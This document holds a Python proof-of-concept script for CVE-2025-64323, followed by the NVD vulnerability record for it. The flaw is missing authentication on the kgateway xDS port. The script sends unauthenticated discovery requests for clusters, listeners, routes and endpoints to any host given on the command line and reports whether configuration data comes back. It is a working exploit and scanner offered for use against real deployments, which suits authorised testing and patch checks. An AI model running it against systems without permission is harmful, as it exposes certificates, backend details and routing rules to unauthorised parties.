CVE-2025-64323

#!/usr/bin/env python3 """ CVE-2025-64323 PoC - kgateway xDS Unauthorized Access This PoC demonstrates the lack of authentication on the xDS port. """ import requests import json import sys def check_xds_port(target_host, xds_port=15010): """ Check if the xDS port is accessible without authentication. """ base_url = f"http://{target_host}:{xds_port}" # Try to access xDS endpoints without authentication endpoints = [ "/v3/discovery:clusters", "/v3/discovery:listeners", "/v3/discovery:routes", "/v3/discovery:endpoints" ] results = { "target": target_host, "port": xds_port, "vulnerable": False, "exposed_data": [] } for endpoint in endpoints: try: # gRPC-style request response = requests.post( f"{base_url}{endpoint}", headers={ "Content-Type": "application/json", "xds-protocol-version": "v3" }, json={ "node": { "id": "test-node", "cluster": "test-cluster" }, "type_url": "type.googleapis.com/envoy.service.discovery.v3.DiscoveryRequest", "resource_names": [] }, timeout=5 ) if response.status_code == 200: data = response.json() if data.get("resources"): results["vulnerable"] = True results["exposed_data"].append({ "endpoint": endpoint, "status": "EXPOSED", "resource_count": len(data.get("resources", [])) }) except requests.exceptions.RequestException: pass return results if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 cve-2025-64323-poc.py <target_host>") sys.exit(1) target = sys.argv[1] result = check_xds_port(target) print(json.dumps(result, indent=2)) if result["vulnerable"]: print("\n[!] Target is VULNERABLE to CVE-2025-64323") print("[!] xDS port is accessible without authentication")

{"cve": {"id": "CVE-2025-64323", "sourceIdentifier": "[email protected]", "published": "2025-11-07T04:15:47.243", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "kgateway is a Cloud-Native API and AI Gateway. Versions 2.0.4 and below and 2.1.0-agw-cel-rbac through 2.1.0-rc.2 lack authentication, allowing any client with unrestricted network access to the xDS port to retrieve potentially sensitive configuration data including certificate data, backend service information, routing rules, and cluster metadata. This issue is solved in versions 2.0.5 and 2.1.0."}, {"lang": "es", "value": "kgateway es un Gateway de API e IA nativo de la nube. Las versiones 2.0.4 e inferiores y de la 2.1.0-agw-cel-rbac a la 2.1.0-rc.2 carecen de autenticación, lo que permite a cualquier cliente con acceso de red sin restricciones al puerto xDS recuperar datos de configuración potencialmente sensibles, incluyendo datos de certificados, información de servicios de backend, reglas de enrutamiento y metadatos de clúster. Este problema se resuelve en las versiones 2.0.5 y 2.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/kgateway-dev/kgateway/issues/10651", "source": "[email protected]"}, {"url": "https://github.com/kgateway-dev/kgateway/pull/12471", "source": "[email protected]"}, {"url": "https://github.com/kgateway-dev/kgateway/pull/12535", "source": "[email protected]"}, {"url": "https://github.com/kgateway-dev/kgateway/security/advisories/GHSA-4766-x535-jw3r", "source": "[email protected]"}]}}